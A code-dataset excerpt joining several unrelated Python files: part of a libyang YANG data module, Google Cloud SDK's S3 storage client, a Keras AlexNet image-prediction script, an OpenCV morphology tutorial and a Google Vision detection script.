cls.NODETYPE_CLASS.get(node_p.schema.nodetype, DNode)\n return nodecls(context, node_p)\n\n\n#------------------------------------------------------------------------------\n@DNode.register(SNode.CONTAINER)\nclass DContainer(DNode):\n\n def create_path(self, path, value=None, rpc_output=False):\n return self.context.create_data_path(\n path, parent=self, value=value, rpc_output=rpc_output)\n\n def children(self):\n child = self._node.child\n while child:\n yield DNode.new(self.context, child)\n child = child.next\n\n def __iter__(self):\n return self.children()\n\n\n#------------------------------------------------------------------------------\n@DNode.register(SNode.RPC)\nclass DRpc(DContainer):\n pass\n\n\n#------------------------------------------------------------------------------\n@DNode.register(SNode.LIST)\nclass DList(DContainer):\n pass\n\n\n#------------------------------------------------------------------------------\n@DNode.register(SNode.LEAF)\nclass DLeaf(DNode):\n\n def __init__(self, context, node_p):\n super().__init__(context, node_p)\n self._leaf = ffi.cast('struct lyd_node_leaf_list *', node_p)\n\n def value(self):\n if self._leaf.value_type == Type.EMPTY:\n return None\n if self._leaf.value_type in Type.NUM_TYPES:\n return int(c2str(self._leaf.value_str))\n if self._leaf.value_type in (\n Type.STRING, Type.BINARY, Type.ENUM, Type.IDENT, Type.BITS):\n return c2str(self._leaf.value_str)\n if self._leaf.value_type == Type.DEC64:\n return lib.lyd_dec64_to_double(self._node)\n if self._leaf.value_type == Type.LEAFREF:\n referenced = DNode.new(self.context, self._leaf.value.leafref)\n return referenced.value()\n if self._leaf.value_type == Type.BOOL:\n return bool(self._leaf.value.bln)\n return None\n\n\n#------------------------------------------------------------------------------\n@DNode.register(SNode.LEAFLIST)\nclass DLeafList(DLeaf):\n pass\n\n\n#------------------------------------------------------------------------------\ndef dict_to_dnode(dic, module, parent=None, rpc=False, rpcreply=False,\n strict=False, data=False, config=False, no_yanglib=False):\n \"\"\"\n Convert a python dictionary to a DNode object given a YANG module object.\n The return value is the first created node. If parent is not set, a\n top-level node is returned.\n\n :arg dict dic:\n The python dictionary to convert.\n :arg Module module:\n The libyang Module object associated with the dictionary.\n :arg DNode parent:\n Optional parent to update. If not specified a new top-level DNode will\n be created.\n :arg bool rpc:\n Data represents RPC or action input parameters.\n :arg bool rpcreply:\n Data represents RPC or action output parameters.\n :arg bool strict:\n Instead of ignoring (with a warning message) data without schema\n definition, raise an error.\n :arg bool data:\n Complete datastore content with configuration as well as state\n data. To handle possibly missing (but by default required)\n ietf-yang-library data, use no_yanglib=True.\n :arg bool config:\n Complete datastore without state data.\n :arg bool no_yanglib:\n Ignore (possibly) missing ietf-yang-library data. Applicable only\n with data=True.\n \"\"\"\n if not dic:\n return None\n\n if not isinstance(dic, dict):\n raise TypeError('dic argument must be a python dict')\n if not isinstance(module, Module):\n raise TypeError('module argument must be a Module object')\n if parent is not None and not isinstance(parent, DNode):\n raise TypeError('parent argument must be a DNode object or None')\n\n created = []\n\n def _create_leaf(_parent, module, name, value, in_rpc_output=False):\n if value is not None:\n if isinstance(value, bool):\n value = str(value).lower()\n elif not isinstance(value, str):\n value = str(value)\n if in_rpc_output:\n n = lib.lyd_new_output_leaf(\n _parent, module._module, str2c(name), str2c(value))\n else:\n n = lib.lyd_new_leaf(\n _parent, module._module, str2c(name), str2c(value))\n if not n:\n if _parent:\n parent_path = repr(DNode.new(module.context, _parent).path())\n else:\n parent_path = 'module %r' % module.name()\n raise module.context.error(\n 'failed to create leaf %r as a child of %s', name, parent_path)\n created.append(n)\n\n def _create_container(_parent, module, name, in_rpc_output=False):\n if in_rpc_output:\n n = lib.lyd_new_output(_parent, module._module, str2c(name))\n else:\n n = lib.lyd_new(_parent, module._module, str2c(name))\n if not n:\n if _parent:\n parent_path = repr(DNode.new(module.context, _parent).path())\n else:\n parent_path = 'module %r' % module.name()\n raise module.context.error(\n 'failed to create container/list/rpc %r as a child of %s',\n name, parent_path)\n created.append(n)\n return n\n\n schema_cache = {}\n\n def _find_schema(schema_parent, name, prefix):\n if isinstance(schema_parent, Module):\n cache_key = (schema_parent._module, name, prefix)\n else:\n cache_key = (schema_parent._node, name, prefix)\n snode, module = schema_cache.get(cache_key, (None, None))\n if snode is not None:\n return snode, module\n if isinstance(schema_parent, SRpc):\n if rpc:\n schema_parent = schema_parent.input()\n elif rpcreply:\n schema_parent = schema_parent.output()\n else:\n raise ValueError('rpc or rpcreply must be specified')\n if schema_parent is None:\n # there may not be any input or any output node in the rpc\n return None, None\n for s in schema_parent:\n if s.name() != name:\n continue\n mod = s.module()\n if prefix is not None and mod.name() != prefix:\n continue\n snode = s\n module = mod\n break\n schema_cache[cache_key] = (snode, module)\n return snode, module\n\n keys_cache = {}\n\n def _dic_keys(_dic, _schema):\n if isinstance(_schema, SList):\n # list keys must be first and in the order specified in the schema\n list_keys = keys_cache.get(_schema._node, None)\n if list_keys is None:\n list_keys = tuple(k.name() for k in _schema.keys())\n keys_cache[_schema._node] = list_keys\n keys = []\n for k in list_keys:\n if k in _dic:\n keys.append(k)\n keys.extend(_dic.keys() - list_keys)\n return keys\n return _dic.keys()\n\n def _to_dnode(_dic, _schema, _parent=ffi.NULL, in_rpc_output=False):\n for key in _dic_keys(_dic, _schema):\n if ':' in key:\n prefix, name = name.split(':')\n else:\n prefix, name = None, key\n\n s, module = _find_schema(_schema, name, prefix)\n if not s:\n if isinstance(_schema, Module):\n path = _schema.name()\n elif isinstance(_schema, SNode):\n path = _schema.schema_path()\n else:\n path = str(_schema)\n if strict:\n raise LibyangError('%s: unknown element %r' % (path, key))\n LOG.warning('%s: skipping unknown element %r', path, key)\n continue\n\n value = _dic[key]\n\n if isinstance(s, SLeaf):\n _create_leaf(_parent, module, name, value, in_rpc_output)\n\n elif isinstance(s, SLeafList):\n if not isinstance(value, (list, tuple)):\n raise TypeError('%s: python value is not a list/tuple: %r'\n % (s.schema_path(), value))\n for v in value:\n _create_leaf(_parent, module, name, v, in_rpc_output)\n\n elif isinstance(s, SRpc):\n n = _create_container(_parent, module, name, in_rpc_output)\n _to_dnode(value, s, n, rpcreply)\n\n elif isinstance(s, SContainer):\n n = _create_container(_parent, module, name, in_rpc_output)\n _to_dnode(value, s, n, in_rpc_output)\n\n elif isinstance(s, SList):\n if not isinstance(value, (list, tuple)):\n raise TypeError('%s: python value is not a list/tuple: %r'\n % (s.schema_path(), value))\n for v in value:\n if not isinstance(v, dict):\n raise TypeError('%s: list element is not a dict: %r'\n % (_schema.schema_path(), v))\n n = _create_container(_parent, module, name, in_rpc_output)\n _to_dnode(v, s, n, in_rpc_output)\n\n result = None\n\n try:\n if parent is not None:\n _parent = parent._node\n _schema_parent = parent.schema()\n else:\n _parent = ffi.NULL\n _schema_parent = module\n _to_dnode(dic, _schema_parent, _parent,\n in_rpc_output=rpcreply and isinstance(parent, DRpc))\n if created:\n result = DNode.new(module.context, created[0])\n result.validate(rpc=rpc, rpcreply=rpc,\n data=data, config=config, no_yanglib=no_yanglib)\n except:\n for c in reversed(created):\n lib.lyd_free(c)\n raise\n\n return result\n","sub_path":"libyang/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":21923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"561712627","text":"# Lint as: python3\n# -*- coding: utf-8 -*- #\n# Copyright 2020 Google LLC. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Implementation of CloudApi for s3 using boto3.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport threading\n\nimport boto3\nimport botocore\nfrom googlecloudsdk.api_lib.storage import cloud_api\nfrom googlecloudsdk.api_lib.storage import errors\nfrom googlecloudsdk.api_lib.storage import s3_metadata_util\nfrom googlecloudsdk.command_lib.storage import errors as command_errors\nfrom googlecloudsdk.command_lib.storage import hash_util\nfrom googlecloudsdk.command_lib.storage import storage_url\nfrom googlecloudsdk.command_lib.storage.resources import s3_resource_reference\nfrom googlecloudsdk.core import exceptions as core_exceptions\nfrom googlecloudsdk.core import log\nfrom googlecloudsdk.core import properties\nfrom googlecloudsdk.core.util import files\nfrom googlecloudsdk.core.util import scaled_integer\n\n\n# S3 does not allow upload of size > 5 GiB for put_object.\nMAX_PUT_OBJECT_SIZE = 5 * (1024**3) # 5 GiB\nBOTO3_CLIENT_LOCK = threading.Lock()\n\n\ndef _raise_if_not_found_error(error, resource_name):\n if error.response.get('ResponseMetadata', {}).get('HTTPStatusCode') == 404:\n # TODO(b/193464904): Remove the hardcoded error message here after\n # refactoring the errors module.\n raise errors.NotFoundError('{} not found: 404.'.format(resource_name))\n\n\ndef _catch_client_error_raise_s3_api_error(format_str=None):\n \"\"\"Decorator that catches botocore ClientErrors and raises S3ApiErrors.\n\n Args:\n format_str (str): A googlecloudsdk.api_lib.storage.errors.S3ErrorPayload\n format string. Note that any properties that are accessed here are on the\n S3ErrorPayload object, not the object returned from botocore.\n\n Returns:\n A decorator that catches botocore.exceptions.ClientError and returns an\n S3ApiError with a formatted error message.\n \"\"\"\n\n return errors.catch_error_raise_cloud_api_error(\n [(botocore.exceptions.ClientError, errors.S3ApiError)],\n format_str=format_str)\n\n\n# pylint:disable=abstract-method\nclass S3Api(cloud_api.CloudApi):\n \"\"\"S3 Api client.\"\"\"\n\n capabilities = {\n # Boto3 implements its own unskippable validation.\n cloud_api.Capability.CLIENT_SIDE_HASH_VALIDATION,\n }\n\n def __init__(self):\n # Using a lock since the boto3.client creation is not thread-safe.\n with BOTO3_CLIENT_LOCK:\n self.client = boto3.client(\n storage_url.ProviderPrefix.S3.value,\n endpoint_url=properties.VALUES.storage.s3_endpoint_url.Get())\n\n @_catch_client_error_raise_s3_api_error()\n def create_bucket(self, bucket_resource, fields_scope=None):\n \"\"\"See super class.\"\"\"\n del fields_scope # Unused in S3 client.\n\n if bucket_resource.retention_period:\n raise ValueError(\n 'S3 API does not accept retention_period argument for create_bucket.')\n if bucket_resource.storage_class:\n raise ValueError(\n 'S3 API does not accept storage_class argument for create_bucket.')\n if bucket_resource.uniform_bucket_level_access:\n raise ValueError(\n 'S3 API does not accept uniform_bucket_level_access argument for create_bucket.'\n )\n\n if bucket_resource.location:\n with BOTO3_CLIENT_LOCK:\n # Create client with appropriate endpoint for creating regional bucket.\n client = boto3.client(\n storage_url.ProviderPrefix.S3.value,\n region_name=bucket_resource.location,\n endpoint_url=properties.VALUES.storage.s3_endpoint_url.Get())\n create_bucket_configuration = {\n 'LocationConstraint': bucket_resource.location\n }\n else:\n client = self.client\n # Must match client's default regional endpoint.\n create_bucket_configuration = {\n 'LocationConstraint': boto3.session.Session().region_name\n }\n\n metadata = client.create_bucket(\n Bucket=bucket_resource.storage_url.bucket_name,\n CreateBucketConfiguration=create_bucket_configuration)\n backend_location = metadata.get('Location')\n return s3_resource_reference.S3BucketResource(\n bucket_resource.storage_url,\n location=backend_location,\n metadata=metadata)\n\n @_catch_client_error_raise_s3_api_error()\n def delete_bucket(self, bucket_name, request_config):\n \"\"\"See super class.\"\"\"\n del request_config # Unused.\n return self.client.delete_bucket(Bucket=bucket_name)\n\n def get_bucket(self, bucket_name, fields_scope=cloud_api.FieldsScope.NO_ACL):\n \"\"\"See super class.\"\"\"\n metadata = {'Name': bucket_name}\n # TODO (b/168716392): As new commands are implemented, they may want\n # specific error handling for different methods.\n try:\n # Low-bandwidth way to determine if bucket exists for FieldsScope.SHORT.\n metadata.update(self.client.get_bucket_location(\n Bucket=bucket_name))\n except botocore.exceptions.ClientError as error:\n _raise_if_not_found_error(error, bucket_name)\n\n metadata['LocationConstraint'] = errors.S3ApiError(error)\n\n if fields_scope is not cloud_api.FieldsScope.SHORT:\n # Data for FieldsScope.NO_ACL.\n for key, api_call, result_has_key in [\n ('CORSRules', self.client.get_bucket_cors, True),\n ('ServerSideEncryptionConfiguration',\n self.client.get_bucket_encryption, True),\n ('LifecycleConfiguration',\n self.client.get_bucket_lifecycle_configuration, False),\n ('LoggingEnabled', self.client.get_bucket_logging, True),\n ('Payer', self.client.get_bucket_request_payment, True),\n ('Versioning', self.client.get_bucket_versioning, False),\n ('Website', self.client.get_bucket_website, False),\n ]:\n try:\n api_result = api_call(Bucket=bucket_name)\n # Some results are wrapped in dictionaries with keys matching \"key\".\n metadata[key] = api_result.get(key) if result_has_key else api_result\n except botocore.exceptions.ClientError as error:\n metadata[key] = errors.S3ApiError(error)\n\n # User requested ACL's with FieldsScope.FULL.\n if fields_scope is cloud_api.FieldsScope.FULL:\n try:\n metadata['ACL'] = self.client.get_bucket_acl(Bucket=bucket_name)\n except botocore.exceptions.ClientError as error:\n metadata['ACL'] = errors.S3ApiError(error)\n\n return s3_resource_reference.S3BucketResource(\n storage_url.CloudUrl(storage_url.ProviderPrefix.S3, bucket_name),\n metadata=metadata)\n\n def patch_bucket(self,\n bucket_resource,\n request_config,\n fields_scope=cloud_api.FieldsScope.NO_ACL):\n \"\"\"See super class.\"\"\"\n del fields_scope, request_config # Unused.\n\n if ('FullACLConfiguration' in bucket_resource.metadata or\n 'ACL' in bucket_resource.metadata):\n try:\n if 'FullACLConfiguration' in bucket_resource.metadata:\n # Can contain canned ACL and other settings.\n # Takes priority over 'ACL' metadata key.\n kwargs = bucket_resource.metadata['FullACLConfiguration']\n else:\n # Data returned by get_bucket_acl.\n kwargs = {'AccessControlPolicy': bucket_resource.metadata['ACL']}\n kwargs['Bucket'] = bucket_resource.name\n self.client.put_bucket_acl(**kwargs)\n except botocore.exceptions.ClientError as error:\n _raise_if_not_found_error(error, bucket_resource.name)\n # Don't return any ACL information in case the failure affected both\n # metadata keys.\n bucket_resource.metadata.pop('FullACLConfiguration', None)\n bucket_resource.metadata.pop('ACL', None)\n log.error(errors.S3ApiError(error))\n\n patchable_metadata = { # Key -> (client function, function kwargs).\n 'CORSRules': (\n self.client.put_bucket_cors,\n {'CORSConfiguration': {\n 'CORSRules': bucket_resource.metadata.get('CORSRules'),\n }}),\n 'ServerSideEncryptionConfiguration': (\n self.client.put_bucket_encryption,\n {'ServerSideEncryptionConfiguration': bucket_resource.metadata.get(\n 'ServerSideEncryptionConfiguration'),\n }),\n 'LifecycleConfiguration': (\n self.client.put_bucket_lifecycle_configuration,\n {'LifecycleConfiguration': bucket_resource.metadata.get(\n 'LifecycleConfiguration'),\n }),\n 'LoggingEnabled': (\n self.client.put_bucket_logging,\n {'BucketLoggingStatus': {\n 'LoggingEnabled': bucket_resource.metadata.get(\n 'LoggingEnabled'),\n }}),\n 'Payer': (\n self.client.put_bucket_request_payment,\n {'RequestPaymentConfiguration': {\n 'Payer': bucket_resource.metadata.get('Payer'),\n }}),\n 'Versioning': (\n self.client.put_bucket_versioning,\n {'VersioningConfiguration': bucket_resource.metadata.get(\n 'Versioning'),\n }),\n 'Website': (\n self.client.put_bucket_website,\n {'WebsiteConfiguration': bucket_resource.metadata.get('Website')}),\n }\n for metadata_key, (patch_function,\n patch_kwargs) in patchable_metadata.items():\n if metadata_key not in bucket_resource.metadata:\n continue\n\n patch_kwargs['Bucket'] = bucket_resource.name\n try:\n patch_function(**patch_kwargs)\n except botocore.exceptions.ClientError as error:\n _raise_if_not_found_error(error, bucket_resource.name)\n log.error(errors.S3ApiError(error))\n del bucket_resource.metadata[metadata_key]\n\n return bucket_resource\n\n def list_buckets(self, fields_scope=cloud_api.FieldsScope.NO_ACL):\n \"\"\"See super class.\"\"\"\n try:\n response = self.client.list_buckets()\n for bucket in response['Buckets']:\n if fields_scope == cloud_api.FieldsScope.FULL:\n yield self.get_bucket(bucket['Name'], fields_scope)\n else:\n yield s3_resource_reference.S3BucketResource(\n storage_url.CloudUrl(\n storage_url.ProviderPrefix.S3, bucket['Name']),\n metadata={'Bucket': bucket, 'Owner': response['Owner']})\n except botocore.exceptions.ClientError as error:\n core_exceptions.reraise(errors.S3ApiError(error))\n\n def list_objects(self,\n bucket_name,\n prefix=None,\n delimiter=None,\n all_versions=False,\n fields_scope=None):\n \"\"\"See super class.\"\"\"\n if all_versions:\n api_method_name = 'list_object_versions'\n objects_key = 'Versions'\n else:\n api_method_name = 'list_objects_v2'\n objects_key = 'Contents'\n try:\n paginator = self.client.get_paginator(api_method_name)\n page_iterator = paginator.paginate(\n Bucket=bucket_name,\n Prefix=prefix if prefix is not None else '',\n Delimiter=delimiter if delimiter is not None else '')\n for page in page_iterator:\n for object_dict in page.get(objects_key, []):\n if fields_scope is cloud_api.FieldsScope.FULL:\n # The metadata present in the list_objects_v2 response or the\n # list_object_versions response is not enough\n # for a FULL scope. Hence, calling the GetObjectMetadata method\n # to get the additonal metadata and ACLs information.\n yield self.get_object_metadata(\n bucket_name=bucket_name,\n object_name=object_dict['Key'],\n generation=object_dict.get('VersionId'),\n fields_scope=fields_scope)\n else:\n yield s3_metadata_util.get_object_resource_from_s3_response(\n object_dict, bucket_name)\n for prefix_dict in page.get('CommonPrefixes', []):\n yield s3_metadata_util.get_prefix_resource_from_s3_response(\n prefix_dict, bucket_name)\n except botocore.exceptions.ClientError as error:\n core_exceptions.reraise(errors.S3ApiError(error))\n\n @_catch_client_error_raise_s3_api_error()\n def copy_object(self,\n source_resource,\n destination_resource,\n request_config,\n progress_callback=None):\n \"\"\"See super class.\"\"\"\n del progress_callback\n\n source_kwargs = {'Bucket': source_resource.storage_url.bucket_name,\n 'Key': source_resource.storage_url.object_name}\n if source_resource.storage_url.generation:\n source_kwargs['VersionId'] = source_resource.storage_url.generation\n\n kwargs = {'Bucket': destination_resource.storage_url.bucket_name,\n 'Key': destination_resource.storage_url.object_name,\n 'CopySource': source_kwargs}\n kwargs.update(\n s3_metadata_util.get_metadata_dict_from_request_config(request_config))\n\n response = self.client.copy_object(**kwargs)\n return s3_metadata_util.get_object_resource_from_s3_response(\n response, kwargs['Bucket'], kwargs['Key'])\n\n # TODO(b/161900052): Implement resumable copies.\n\n def _get_content_encoding(self, resource):\n \"\"\"Returns the ContentEncoding for the resource.\n\n Returns the ContentEncoding if it is already present in the resource object.\n If it is not present, it makes an API call to fetch the object's metadata.\n This might happen if the resource was not created using the head_object\n call, for example, in case of S3Api.list_objects call which is used by the\n WildCardIterator if a wildcard is present.\n\n Args:\n resource (resource_reference.ObjectResource): Resource representing an\n existing object.\n\n Returns:\n A string representing the ContentEncoding for the S3 Object.\n \"\"\"\n if resource.metadata:\n content_encoding = resource.metadata.get('ContentEncoding')\n else:\n content_encoding = None\n\n if content_encoding is not None:\n return content_encoding\n\n complete_resource = self.get_object_metadata(resource.bucket, resource.name,\n resource.generation)\n return complete_resource.metadata.get('ContentEncoding')\n\n @_catch_client_error_raise_s3_api_error()\n def download_object(self,\n cloud_resource,\n download_stream,\n decryption_wrapper=None,\n digesters=None,\n do_not_decompress=False,\n download_strategy=cloud_api.DownloadStrategy.ONE_SHOT,\n progress_callback=None,\n start_byte=0,\n end_byte=None):\n \"\"\"See super class.\"\"\"\n extra_args = {}\n if cloud_resource.generation:\n extra_args['VersionId'] = cloud_resource.generation\n\n if download_strategy == cloud_api.DownloadStrategy.RESUMABLE:\n response = self.client.get_object(\n Bucket=cloud_resource.bucket,\n Key=cloud_resource.name,\n Range='bytes={}-'.format(start_byte),\n )\n processed_bytes = start_byte\n for chunk in response['Body'].iter_chunks(\n scaled_integer.ParseInteger(\n properties.VALUES.storage.download_chunk_size.Get())):\n download_stream.write(chunk)\n processed_bytes += len(chunk)\n if progress_callback:\n progress_callback(processed_bytes)\n else:\n # TODO(b/172480278) Conditionally call get_object for smaller object.\n self.client.download_fileobj(\n cloud_resource.bucket,\n cloud_resource.name,\n download_stream,\n Callback=progress_callback,\n ExtraArgs=extra_args)\n\n # Download callback doesn't give us streaming data, so we have to\n # read whole downloaded file to update digests.\n if digesters:\n with files.BinaryFileReader(\n download_stream.name) as completed_download_stream:\n completed_download_stream.seek(0)\n for hash_algorithm in digesters:\n digesters[hash_algorithm] = hash_util.get_hash_from_file_stream(\n completed_download_stream, hash_algorithm)\n\n return self._get_content_encoding(cloud_resource)\n\n # TODO(b/161437901): Handle resumed download.\n # TODO(b/161460749): Handle download retries.\n\n @_catch_client_error_raise_s3_api_error()\n def delete_object(self, object_url, request_config):\n \"\"\"See super class.\"\"\"\n del request_config # Unused.\n\n delete_object_kwargs = {\n 'Bucket': object_url.bucket_name,\n 'Key': object_url.object_name,\n }\n if object_url.generation:\n delete_object_kwargs['VersionId'] = object_url.generation\n return self.client.delete_object(**delete_object_kwargs)\n\n @_catch_client_error_raise_s3_api_error()\n def get_object_metadata(self,\n bucket_name,\n object_name,\n generation=None,\n fields_scope=None):\n \"\"\"See super class.\"\"\"\n request = {'Bucket': bucket_name, 'Key': object_name}\n\n # The VersionId keyword argument to head_object is not nullable if it is\n # present, so only include it in the function call if it has a value.\n if generation is not None:\n request['VersionId'] = generation\n\n try:\n object_dict = self.client.head_object(**request)\n except botocore.exceptions.ClientError as e:\n _raise_if_not_found_error(\n e,\n storage_url.CloudUrl(storage_url.ProviderPrefix.S3, bucket_name,\n object_name, generation).url_string)\n raise e\n\n # User requested ACL's with FieldsScope.FULL.\n if fields_scope is cloud_api.FieldsScope.FULL:\n try:\n acl_response = self.client.get_object_acl(**request)\n acl_response.pop('ResponseMetadata', None)\n object_dict['ACL'] = acl_response\n except botocore.exceptions.ClientError as error:\n object_dict['ACL'] = errors.S3ApiError(error)\n\n return s3_metadata_util.get_object_resource_from_s3_response(\n object_dict, bucket_name, object_name)\n\n def _upload_using_managed_transfer_utility(self, source_stream,\n destination_resource, extra_args):\n \"\"\"Uploads the data using boto3's managed transfer utility.\n\n Calls the upload_fileobj method which performs multi-threaded multipart\n upload automatically. Performs slightly better than put_object API method.\n However, upload_fileobj cannot perform data intergrity checks and we have\n to use put_object method in such cases.\n\n Args:\n source_stream (a file-like object): A file-like object to upload. At a\n minimum, it must implement the read method, and must return bytes.\n destination_resource (resource_reference.ObjectResource|UnknownResource):\n Represents the metadata for the destination object.\n extra_args (dict): Extra arguments that may be passed to the client\n operation.\n\n Returns:\n resource_reference.ObjectResource with uploaded object's metadata.\n \"\"\"\n bucket_name = destination_resource.storage_url.bucket_name\n object_name = destination_resource.storage_url.object_name\n self.client.upload_fileobj(\n Fileobj=source_stream,\n Bucket=bucket_name,\n Key=object_name,\n ExtraArgs=extra_args)\n return self.get_object_metadata(bucket_name, object_name)\n\n def _upload_using_put_object(self, source_stream, destination_resource,\n extra_args):\n \"\"\"Uploads the source stream using the put_object API method.\n\n Args:\n source_stream (a seekable file-like object): The stream of bytes to be\n uploaded.\n destination_resource (resource_reference.ObjectResource|UnknownResource):\n Represents the metadata for the destination object.\n extra_args (dict): Extra arguments that may be passed to the client\n operation.\n\n Returns:\n resource_reference.ObjectResource with uploaded object's metadata.\n \"\"\"\n kwargs = {\n 'Bucket': destination_resource.storage_url.bucket_name,\n 'Key': destination_resource.storage_url.object_name,\n 'Body': source_stream,\n }\n kwargs.update(extra_args)\n response = self.client.put_object(**kwargs)\n return s3_metadata_util.get_object_resource_from_s3_response(\n response, destination_resource.storage_url.bucket_name,\n destination_resource.storage_url.object_name)\n\n @_catch_client_error_raise_s3_api_error()\n def upload_object(self,\n source_stream,\n destination_resource,\n request_config,\n serialization_data=None,\n tracker_callback=None,\n upload_strategy=cloud_api.UploadStrategy.SIMPLE):\n \"\"\"See super class.\"\"\"\n del serialization_data, tracker_callback\n\n if upload_strategy != cloud_api.UploadStrategy.SIMPLE:\n raise command_errors.Error(\n 'Invalid upload strategy: {}.'.format(upload_strategy.value))\n\n # All fields common to both put_object and upload_fileobj are added\n # to the extra_args dict.\n extra_args = s3_metadata_util.get_metadata_dict_from_request_config(\n request_config)\n\n if request_config.md5_hash:\n # The upload_fileobj method can perform multipart uploads, so it cannot\n # validate with user-provided MD5 hashes. Hence we use the put_object API\n # method if MD5 validation is requested.\n if request_config.size > MAX_PUT_OBJECT_SIZE:\n raise errors.S3ApiError(\n 'Cannot upload to destination: {url} because MD5 validation can'\n ' only be performed for file size <= {maxsize} Bytes. Current file'\n ' size is {filesize} Bytes. You can remove the MD5 validation'\n ' requirement to complete the upload'.format(\n url=destination_resource.storage_url.url_string,\n maxsize=MAX_PUT_OBJECT_SIZE,\n filesize=request_config.size))\n\n return self._upload_using_put_object(source_stream, destination_resource,\n extra_args)\n else:\n # We default to calling the upload_fileobj method provided by boto3 which\n # is a managed-transfer utility that can perform mulitpart uploads\n # automatically. It can be used for non-seekable source_streams as well.\n return self._upload_using_managed_transfer_utility(\n source_stream, destination_resource, extra_args)\n","sub_path":"google-cloud-sdk/lib/googlecloudsdk/api_lib/storage/s3_api.py","file_name":"s3_api.py","file_ext":"py","file_size_in_byte":23123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"344851699","text":"import numpy as np\r\nimport json\r\nimport matplotlib.pyplot as plt\r\nfrom model import AlexNet\r\nfrom PIL import Image\r\n\r\nimport keras.backend.tensorflow_backend as KTF\r\nimport tensorflow as tf\r\nconfig=tf.compat.v1.ConfigProto()\r\nconfig.gpu_options.allow_growth=True # 不全部占满显存, 按需分配\r\nconfig.gpu_options.per_process_gpu_memory_fraction=0.6 # 限制GPU内存占用率\r\nsess=tf.compat.v1.Session(config=config)\r\n\r\nim_height = 224\r\nim_width = 224\r\nimg = Image.open(\"./rose.jpg\")\r\nimg = img.resize((im_height, im_width))\r\nplt.imshow(img)\r\n\r\nimg = np.array(img) / 255\r\nimg = (np.expand_dims(img, 0))\r\n\r\ntry:\r\n json_file = open(\"./class_indices.json\", \"r\")\r\n class_indict = json.load(json_file)\r\nexcept Exception as e:\r\n print(e)\r\n exit(-1)\r\n\r\nmodel = AlexNet(class_num=5)\r\nmodel.load_weights(\"./save_weights/myAlex.h5\")\r\nresult = model.predict(img) # 得到的会是含有batch这个维度的数据 [[0.06769567 0.0463397 0.46235803 0.0457924 0.37781426]]\r\npredict_class = np.squeeze(result) # 去掉batch维度\r\npredict_class = np.argmax(predict_class)\r\nprint(class_indict[str(predict_class)], result[0][predict_class])\r\nplt.show()\r\n","sub_path":"Tensorflow实现AlexNet/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"440692709","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef load_img():\n img = np.zeros((600, 600))\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(img, text='HELLO', org=(50, 300),\n fontFace=font, fontScale=5,\n color=(255, 255, 255), thickness=26)\n return img\n\n\ndef display_img(img): # acrescentar na funcao **args - para q assim eu tenha plots de mais de uma imagem\n fig = plt.figure(figsize=(12, 10))\n ax = fig.add_subplot(111)\n ax.imshow(img, cmap='gray')\n plt.show()\n\nimg = load_img()\ndisplay_img(img)\n\nkernel = np.ones((5, 5), dtype=np.uint8)\nkernel\n# -----\n# Erosao\nres = cv2.erode(img, kernel, iterations=6)\ndisplay_img(res)\n\nimg = load_img()\n# criando ruido branco\nw_noise = np.random.randint(low=0, high=2, size=(600, 600))\nw_noise\ndisplay_img(w_noise)\n\nimg.max()\n\nw_noise = w_noise * 255\nw_noise\ndisplay_img(w_noise)\n\nimg_noise = w_noise + img\ndisplay_img(img_noise)\n\n# ------\n# aplicando morfologia opening (erosion + dilation)\nopening = cv2.morphologyEx(img_noise, cv2.MORPH_OPEN, kernel)\ndisplay_img(opening)\n\nimg = load_img()\n\n# usando opening numa imagem c/ ruido preto\n## preparando o ruido preto (white noise dentro da letra)\nb_noise = np.random.randint(low=0, high=2, size=(600, 600))\nb_noise = b_noise * -255\n\nb_noise_img = img + b_noise\nb_noise_img[b_noise_img == -255] = 0\ndisplay_img(b_noise_img)\nb_noise_img.max()\n\n## aplicando morfologia closing\nclosing = cv2.morphologyEx(b_noise_img, cv2.MORPH_CLOSE, kernel)\ndisplay_img(closing)\ndisplay_img(img)\n\nimg = load_img()\n\n## aplicando morfologia gradient (Erosion - Dilation)\ngradient = cv2.morphologyEx(img, cv2.MORPH_GRADIENT, kernel)\n\ndisplay_img(gradient)","sub_path":"Computer Vision/Aula2-VisãoComputacional/09-Morphological.py","file_name":"09-Morphological.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"518093658","text":"import io\nimport os\n\nfrom google.cloud import vision\nfrom google.cloud.vision import types\n\nimgPath = \"assets/bookshelf_test.jpg\"\n\ndef detect_text(path):\n \"\"\"Detects text in the file.\"\"\"\n client = vision.ImageAnnotatorClient()\n\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n\n image = vision.types.Image(content=content)\n\n #response = client.text_detection(image=image)\n objects = client.object_localization(image=image).localized_object_annotations\n #texts = response.text_annotations\n #print('Texts:')\n\n #textList = []\n\n #count = 0\n\n print('Number of objects found: {}'.format(len(objects)))\n for object_ in objects:\n print('\\n{} (confidence: {})'.format(object_.name, object_.score))\n print('Normalized bounding polygon vertices: ')\n for vertex in object_.bounding_poly.normalized_vertices:\n print(' - ({}, {})'.format(vertex.x, vertex.y))\n\n # for text in texts:\n # print(count)\n # #count += 1\n # #rint('\\n\"{}\"'.format(text.description))\n # textList.append(text.description)\n\n # for name in textList:\n # print(name)\n\n\ndetect_text(imgPath)\n 